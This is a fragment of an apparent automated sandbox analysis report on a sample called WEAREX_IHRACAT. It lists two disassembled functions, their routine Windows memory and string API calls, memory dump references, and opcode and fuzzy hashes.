                          • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                          • GlobalFree.KERNEL32(?), ref: 10001203
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$Free$Alloclstrcpy
                          • String ID:
                          • API String ID: 852173138-0
                          • Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                          • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                          • Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                          • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                          Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                          • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                          • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                          • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                          • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                          • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9